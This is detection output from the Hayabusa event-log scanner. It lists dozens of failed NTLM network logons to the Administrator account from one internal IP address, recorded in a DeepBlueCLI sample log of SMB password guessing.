2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ahrOLfdy6DCQ9SfO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xiooSdP5eib8PUE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6nQ2jp9IGYnGeyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejMtyR5QNdJFhw1W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e50kO0aVhfw5np5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 176XyLw6IhEI6NuD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXCzCSSFvpbWNJFd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhHRuZYlH8hekaKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGIUBFRMQ3OBbOA0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7CTT5g1w58eRRlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmVccmad66uOK9ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t1jlT6kEcs14dcNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBty5jOGkkZSZEyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Ci7YUsO5MtFkDSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 12JToliq9mmAuMTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lw9AgAvBGWoXBlim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ReGDyvRpGknAKqqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6mdUn8na4asRfpJP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7Wm5p4HnNCbkyh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MQZwerVd6E08X8Ou  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbDjtLKoX5Q77bn5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O7BNKHiPjzJKCaDk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHqBI8bzZn5VO9gq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xz2ZO3b3QSh6Rdqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEfdhrwbTfCpCXKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kc0LuQzAmQTIF1X3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WMZ70YmzpVp2h8mY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FFVr3Amq6mA3umiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnN15vqZcww8pqTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSuMRF1txQ9g2Mwi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tUuapChhs4CGO1cS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIMr0hjIkwD8AaEG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ww9HMQX0cqmolYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJRRZ5e9lARVZDar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvUzVoSLqFPAXSWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SMMgPu1VJIjAWPDW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1JjIa4nOKDTLuAD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0J0GJIm1UUXHH9QJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVX3xIz0hrQFvPr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nv4tKFEmHjiXkVDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdHHJl9LBek9pIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MWofwwLjwiyBk39P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dvsHFZe7Z1uJ9Dkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aDdgwvb1zsZF79k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQUb6CnMUtyrMNhF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP5OxHPsbLHnIUBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ysg903vYFhQHYvFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IySarHtsTvwSP56H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnUy8tbCIAVnmhDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bfBtc4MnMtPG6MpC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37b8MGIHY8QwXf9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDuaWikplDmJNmIE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kSSoAYJILHCPI7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9ikrtTGcZYU1556  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ypyd6SagvUXQHhtZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWS37lIJ3Q6ghgMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H211KmFImpBRwTGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64tO5iBehXQcNc49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xvxDngRj3j5TAwST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8VYRjMnxDgUTWYf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhWphTesbUf0hwi1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MO8VRRVANxIkDzEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ziSXANiDAf7LRFz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g0CvYYtyEcU2riBX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPg2LKgWMeM0Oqo0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbzL9T2d4RdeCz4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PeEfbWpoipfYtOKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RKJW1vSrIAbRTzyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aU4G8NBru22Vc4Cl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sacBcqxV97FUihrd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 41Ms0lEMeT0jYxYj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkQWVEHGM1NxowR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
